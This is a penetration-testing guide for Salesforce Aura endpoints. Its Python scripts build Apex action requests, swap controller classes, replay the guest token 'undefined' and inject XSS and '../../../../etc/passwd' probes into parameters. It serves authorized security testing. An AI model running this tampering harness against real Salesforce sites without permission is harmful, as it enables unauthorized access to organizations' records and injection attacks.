TL;DR

  • Aura requests are form-encoded POSTs to /sfsites/aura (or /s/sfsites/aura on Experience Cloud sites); the message and aura.context fields carry JSON.
  • Most findings come from parameter tampering and over-permissive @AuraEnabled Apex methods, especially ones reachable by the Guest User profile.
  • Focus on classname, method and params inside message.actions[].params.

Common Findings

  Type                      Description
  ------------------------  ----------------------------------------------------------------
  Unvalidated redirect      aura.redirect target or aura.token misuse
  Parameter tampering       Values set with action.setParams() trusted server-side without validation
  DOM-based XSS             Unsafe HTML merges in components (server data rendered as markup)
  Access control bypass     Public (guest-reachable) components and Apex in siteforce:communityApp
  Endpoint injection        Manipulated aura.context and message JSON
  Insecure deserialization  Cached or globals values consumed without validation

Anatomy of an Aura Request

Typical endpoint:

POST /sfsites/aura

Experience Cloud (community) sites usually expose the same endpoint under the site path, e.g. /s/sfsites/aura. The body is application/x-www-form-urlencoded; only the values are JSON.

Key parameters:

  • message - JSON {"actions":[{"id","descriptor","callingDescriptor","params"}]}. For Apex calls the descriptor is aura://ApexActionController/ACTION$execute and params carries classname, method, params (the method's arguments), cacheable and isContinuation.
  • aura.context - JSON with mode (PROD or DEV), fwuid (framework UID; must match the server's), app (e.g. siteforce:communityApp), loaded (component hashes) and globals.
  • aura.token - CSRF-style token tied to the session; the literal string "undefined" is what guest (unauthenticated) sessions send.
  • aura.pageURI - the page the action was fired from; usually present but not security-relevant.

Test Checklist

  1. Swap classname and method to reach Apex methods the UI never calls; a method is reachable if it is @AuraEnabled and the class is accessible to the calling profile (Guest User on public sites).
  2. Fuzz params for injection and validation errors. Apex runs in system mode: record sharing applies only if the class declares with sharing, and object/field permissions apply only where the code enforces them (WITH SECURITY_ENFORCED, USER_MODE, Security.stripInaccessible), so look for records the caller should not see, not just exceptions.
  3. Toggle aura.context.mode between PROD and DEV and compare error verbosity.
  4. Remove or forge aura.token, and replay the guest value "undefined", to test whether the server ties the action to a session.
  5. Record any data returned to unauthenticated calls and compare it with the same action sent with a valid session.
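The request shape from the previous section and checklist steps 1, 3, 4 and 5 in one script, added here as an example (not Salesforce code). Assumptions: the descriptor and field names match what a Lightning or Experience Cloud page sends; the host, class, method and fwuid values are placeholders; the three sample replies are constructed by hand, and the regex that pulls the expected fwuid out of an out-of-sync error assumes the "Expected: <id>" wording. Nothing touches the network unless main() is run.

```python
"""Build one Aura action request for /sfsites/aura and triage the reply."""
import json
import re
import urllib.parse
import urllib.request

# Framework descriptor that routes an action to an @AuraEnabled Apex method.
APEX_DESCRIPTOR = "aura://ApexActionController/ACTION$execute"


def apex_action(classname, method, params=None, action_id="1;a", namespace=""):
    """One element of message.actions invoking classname.method(params)."""
    return {
        "id": action_id,
        "descriptor": APEX_DESCRIPTOR,
        "callingDescriptor": "UNKNOWN",
        "params": {
            "namespace": namespace,
            "classname": classname,
            "method": method,
            "params": params or {},
            "cacheable": False,
            "isContinuation": False,
        },
    }


def aura_body(actions, fwuid, app="siteforce:communityApp", token="undefined",
              mode="PROD", loaded=None, page_uri="/s/"):
    """Form-encode the POST body; message and aura.context are JSON strings.

    token="undefined" is what a guest browser sends; a logged-in session
    carries a session-bound token. `loaded` holds the app's component hash
    from the page source; an empty map is used here as a placeholder.
    """
    context = {"mode": mode, "fwuid": fwuid, "app": app,
               "loaded": loaded or {}, "dn": [], "globals": {}, "uad": False}
    fields = {
        "message": json.dumps({"actions": list(actions)}),
        "aura.context": json.dumps(context),
        "aura.pageURI": page_uri,
        "aura.token": token,
    }
    return urllib.parse.urlencode(fields)


def send(url, body, cookie=None, timeout=15):
    """POST the encoded body and parse the JSON reply (only used by main)."""
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    if cookie:
        headers["Cookie"] = cookie  # replay with and without a session
    req = urllib.request.Request(url, data=body.encode(), headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read().decode())


# Assumed wording of the framework-mismatch error; adjust to what you observe.
FWUID_HINT = re.compile(r"Expected:\s*([A-Za-z0-9_\-]+)")


def _count_records(value):
    """Count record-like objects (dicts carrying an Id) anywhere in a returnValue."""
    if isinstance(value, dict):
        return 1 if "Id" in value else sum(_count_records(v) for v in value.values())
    if isinstance(value, list):
        return sum(_count_records(v) for v in value)
    return 0


def triage(reply):
    """Per-action state, record count and error text, plus any expected fwuid
    the server named in an out-of-sync exception."""
    out = {"actions": [], "exception": None, "expected_fwuid": None}
    if reply.get("exceptionEvent"):
        event = reply.get("event", {})
        msg = reply.get("exceptionMessage") or \
            event.get("attributes", {}).get("values", {}).get("message", "")
        out["exception"] = msg or event.get("descriptor")
        hit = FWUID_HINT.search(msg)
        if hit:
            out["expected_fwuid"] = hit.group(1)
    for act in reply.get("actions", []):
        out["actions"].append({
            "id": act.get("id"),
            "state": act.get("state"),
            "records": _count_records(act.get("returnValue")),
            "errors": [e.get("message") for e in act.get("error") or []],
        })
    return out


# Constructed sample replies (not captured from a real org).
SAMPLE_SUCCESS = {"actions": [{"id": "1;a", "state": "SUCCESS", "error": [],
                  "returnValue": [{"Id": "001000000000001AAA", "Name": "Acme"},
                                  {"Id": "001000000000002AAA", "Name": "Globex"}]}]}
SAMPLE_ERROR = {"actions": [{"id": "1;a", "state": "ERROR", "returnValue": None,
                "error": [{"message": "Method not found: MyController.getAll"}]}]}
SAMPLE_OUT_OF_SYNC = {"exceptionEvent": True, "event": {
    "descriptor": "markup://aura:clientOutOfSync", "attributes": {"values": {
        "message": "Framework has been updated. Expected: Ab12Cd Actual: stale"}}}}


def main():
    body = aura_body([apex_action("MyController", "getAll")], fwuid="stale")
    reply = send("https://example.invalid/s/sfsites/aura", body)  # placeholder host
    print(json.dumps(triage(reply), indent=2))


if __name__ == "__main__":
    main()
```

Run the same action twice, once with token "undefined" and no cookie and once with a session cookie and the page's real aura.token, and compare the two triage summaries: a non-zero record count on the guest run is the finding checklist step 5 is after.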

Example Tampering Ideas

  • classname -> try other controllers (e.g. AccountController); harvest real class names from the site's JavaScript and from the descriptors of other captured actions rather than guessing. Built-in controllers are worth a look too, e.g. serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems with entityNameOrId set to an object name.
  • params -> try "<img src=x onerror=alert(1)>" (exploitable only where a component renders the returned value as HTML) or path traversal payloads in any string argument, including nested ones.
  • aura.context -> an invalid fwuid produces an out-of-sync error that commonly names the expected fwuid; mode DEV can make error messages more verbose.
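The tampering ideas above as a small harness that takes a captured request, emits one-change-at-a-time variants (class swaps, probes in every string argument, context and token changes) and diffs each reply against the baseline. This is an added example, not Salesforce or any project's code; the baseline request, the alternative class names and both replies are constructed by hand, and a tester substitutes a real capture and names harvested from the site's JavaScript.

```python
"""Generate tampered variants of a captured Aura request and diff replies."""
import copy
import json

XSS_PROBE = "<img src=x onerror=alert(1)>"
TRAVERSAL_PROBE = "../../../../etc/passwd"
PROBES = (XSS_PROBE, TRAVERSAL_PROBE)


def _string_paths(obj, prefix=()):
    """Yield the key path of every string leaf inside nested dict/list params."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from _string_paths(val, prefix + (key,))
    elif isinstance(obj, list):
        for idx, val in enumerate(obj):
            yield from _string_paths(val, prefix + (idx,))
    elif isinstance(obj, str):
        yield prefix


def _set_path(obj, path, value):
    node = obj
    for key in path[:-1]:
        node = node[key]
    node[path[-1]] = value


def mutations(message, context, token, classnames=(), probes=PROBES):
    """Yield (label, message, context, token); each variant changes one thing."""
    def fresh():
        return copy.deepcopy(message), copy.deepcopy(context)

    for i, action in enumerate(message.get("actions", [])):
        params = action.get("params", {})
        if "classname" not in params:
            continue  # not an Apex action; nothing to swap
        for cls in classnames:
            if cls == params["classname"]:
                continue
            m, c = fresh()
            m["actions"][i]["params"]["classname"] = cls
            yield f"actions[{i}].classname={cls}", m, c, token
        for path in _string_paths(params.get("params", {})):
            dotted = ".".join(str(p) for p in path)
            for probe in probes:
                m, c = fresh()
                _set_path(m["actions"][i]["params"]["params"], path, probe)
                yield f"actions[{i}].params.{dotted}={probe!r}", m, c, token
    m, c = fresh()
    c["mode"] = "DEV"
    yield "context.mode=DEV", m, c, token
    m, c = fresh()
    c["fwuid"] = "invalid"
    yield "context.fwuid=invalid", m, c, token
    if token != "undefined":
        m, c = fresh()
        yield "token=undefined (guest value)", m, c, "undefined"
    m, c = fresh()
    yield "token=forged", m, c, "forged-" + str(token)


def reflected(reply, probe):
    """True if the probe comes back verbatim anywhere in the reply."""
    return probe in json.dumps(reply)


def diff_replies(baseline, tampered):
    """Reasons a tampered reply deserves a look next to the baseline reply."""
    reasons = []
    if bool(tampered.get("exceptionEvent")) != bool(baseline.get("exceptionEvent")):
        reasons.append("exception state changed")
    base = {a.get("id"): a for a in baseline.get("actions", [])}
    for act in tampered.get("actions", []):
        aid = act.get("id")
        ref = base.get(aid)
        if ref is None:
            reasons.append(f"{aid}: action missing from baseline")
            continue
        if act.get("state") != ref.get("state"):
            reasons.append(f"{aid}: state {ref.get('state')} -> {act.get('state')}")
        elif act.get("returnValue") != ref.get("returnValue"):
            reasons.append(f"{aid}: returnValue differs")
        known = {e.get("message") for e in ref.get("error") or []}
        for err in act.get("error") or []:
            if err.get("message") not in known:
                reasons.append(f"{aid}: new error {err.get('message')!r}")
    return reasons


# Constructed baseline capture and replies (placeholders, not from a real org).
BASELINE_MESSAGE = {"actions": [{"id": "1;a",
    "descriptor": "aura://ApexActionController/ACTION$execute",
    "callingDescriptor": "UNKNOWN",
    "params": {"namespace": "", "classname": "CaseController", "method": "search",
               "params": {"term": "printer", "filters": {"status": "Open"}},
               "cacheable": False, "isContinuation": False}}]}
BASELINE_CONTEXT = {"mode": "PROD", "fwuid": "AbCdEf", "app": "siteforce:communityApp",
                    "loaded": {}, "dn": [], "globals": {}, "uad": False}
BASELINE_TOKEN = "placeholder-session-token"
BASELINE_REPLY = {"actions": [{"id": "1;a", "state": "SUCCESS", "error": [],
    "returnValue": [{"Id": "500000000000001AAA", "Subject": "printer jam"}]}]}
TAMPERED_REPLY = {"actions": [{"id": "1;a", "state": "SUCCESS", "error": [],
    "returnValue": [{"Id": "500000000000001AAA",
                     "Subject": "<img src=x onerror=alert(1)> jam"}]}]}
```

Send each variant with the same encoder you use for the baseline and keep the label next to the diff output; a "returnValue differs" on a classname swap means a different controller answered, while a reflected probe tells you which component to inspect for unsafe HTML merging.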

Notes

  • Always confirm which components are public vs authenticated: replay each action with aura.token "undefined" and no session cookie, then again with a valid session, and compare what comes back.
  • Keep payloads small (one action per message, modest pageSize values) so a failure is attributable to the field you changed rather than to request size or timeouts.